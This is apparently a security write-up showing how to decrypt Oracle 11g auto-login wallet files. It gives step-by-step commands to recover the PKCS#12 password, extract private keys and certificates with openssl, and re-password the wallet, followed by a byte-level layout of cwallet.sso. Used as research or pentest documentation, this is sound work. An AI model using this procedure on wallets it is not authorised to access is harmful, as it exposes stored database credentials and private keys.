Oracle Wallets can be used to store SSL certificates, private keys and even plain text passwords (“secure external password store”) for database authentication. Oracle provides a functionality to access Wallets without a need to enter the wallet password manually. This is called “auto login” (Single-Sign-On aka SSO). There is also a functionality to prevent a wallet which has been copied to a remote system to be opened. This is called “auto login local”.
Unfortunately, there are ways to decrypt auto login wallets and read the contents. This is possible because the password is written into the header of the wallets “cwallet.sso” file.
Step-by-step guide
- Download the Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files
- Download OKS
- Download ssoDecrypt
- Patch JRE with JCE Unlimited Strength Jurisdiction Policy
- Copy the content of the “oks” folder from the OKS PoC above into the libs/ folder of ssoDecrypt
- Compile and run ssoDecrypt with the path to “cwallet.sso” as argument
- Copy cwallet.sso to newP12wallet.p12 without SSO header (first 77 bytes)
- Set us a new password for your wallet with the old password we decrypted earlier
- Use the new wallet with “orapki” and our new password
Demo
Install everything
$ sudo cp local_policy.jar /usr/lib/jvm/java-8-oracle/jre/lib/security/$ sudo cp US_export_policy.jar /usr/lib/jvm/java-8-oracle/jre/lib/security/$ javac -cp .:libs/:libs/bcprov-jdk16-145.jar ssoDecryptor.java$ vi ssoDecrypt.sh#!/bin/sh java -cp .:libs:libs/bcprov-jdk16-145.jar ssoDecryptor $@
Actually crack the SSO wallet
$ ./ssoDecrypt.sh ../Pablo-Linux11/cwallet.sso sso key: c29XXXXXXXXXX96 sso secret: 71c61e1XXXXXXXXXX99c77d747fa0f53e79ccd170409964b p12 password (hex): 1e482XXXXXXXXXX1f1f0b296f6178021c -------------------------------------------------------- ----------------------------------------------
You may now reinstall the original wallet:
$ echo 1e482XXXXXXXXXX1f1f0b296f6178021c | xxd -p -r > cwallet.key$ ls -lhrt total 18K -rwxr--r-- 1 akira friends 6,5K Nov 24 15:16 ewallet.p12 -rw------- 1 akira friends 6,5K Nov 24 15:16 cwallet.sso -rw-r--r-- 1 akira friends 16 Nov 24 18:28 cwallet.key akira@LinuxMintWorkstation ~/SSO/Pablo-Linux11 $ dd if=cwallet.sso of=NewP12wallet.p12 bs=1 skip=77 6560+0 records in 6560+0 records out 6560 bytes (6,6 kB) copied, 0,0240742 s, 272 kB/s
Test validity of the P12 file:
$ openssl pkcs12 -in NewP12wallet.p12 -nodes -passin file:cwallet.key MAC verified OK Bag Attributes friendlyName: orakey localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 Key Attributes: <No Attributes> -----BEGIN PRIVATE KEY----- MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKabcdSlAgEAAoIBAQCk1c6DKFmmUz01(...)-----END CERTIFICATE----- Bag Attributes friendlyName: orakey localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 subject=/CN=ORCL11G issuer=/C=DE/ST=Hamburg/O=ps.corp/CN=PS.CORP-PROC01 -----BEGIN CERTIFICATE----- MIIE6jCCAtKgAwIBAgICEAEwDQYJKoZabcdNAQELBQAwSjELMAkGA1UEBhMCREUx(...)-----END CERTIFICATE-----
Set a new password for our wallet:
$ orapki wallet change_pwd -wallet NewP12wallet.p12 -oldpwd `cat cwallet.key` -newpwd test1234 Oracle PKI Tool : Version 12.1.0.2 Copyright (c) 2004, 2014, Oracle and/or its affiliates. All rights reserved.
Use the “new” wallet:
$ orapki wallet display -wallet NewP12wallet.p12 Oracle PKI Tool : Version 12.1.0.2 Copyright (c) 2004, 2014, Oracle and/or its affiliates. All rights reserved.Enter wallet password: Requested Certificates: User Certificates: Subject: CN=ORCL11G Trusted Certificates: Subject: CN=PS.CORP-PROC01,O=ps.corp,ST=Hamburg,C=DE Subject: CN=PS.CORP-ROOT01,O=ps.corp,ST=Hamburg,C=DE
This very approach currently works with 11g only.
Background
File structure of 11g cwallet.sso
0x00 - 0x4C Header: 0x00 - 0x02 First 3 bytes are always A1 F8 4E (wallet recognition?!) 0x03 Type = SSO: 36; LSSO: 38 0x04 - 0x06 00 00 00 0x07 Version (10g: 05; 11g: 06) 0x08 - 0x0A 00 00 00 0x0B - 0x0C 11g: always the same (41 35) 0x0D - 0x1C DES key 0x1D - 0x4C DES secret (DES -> CBC -> PKCS7 padding) which contains the PKCS#12 password 0x4D - EOF PKCS#12 data (ASN.1 block)
Local SSO wallet
In the local SSO wallet version (-auto_login_local), the decrypted DES secret is a message which needs to be hashed (HMAC SHA1) with a key to get the actual PKCS#12 password. This key is made from username and hostname of the original system.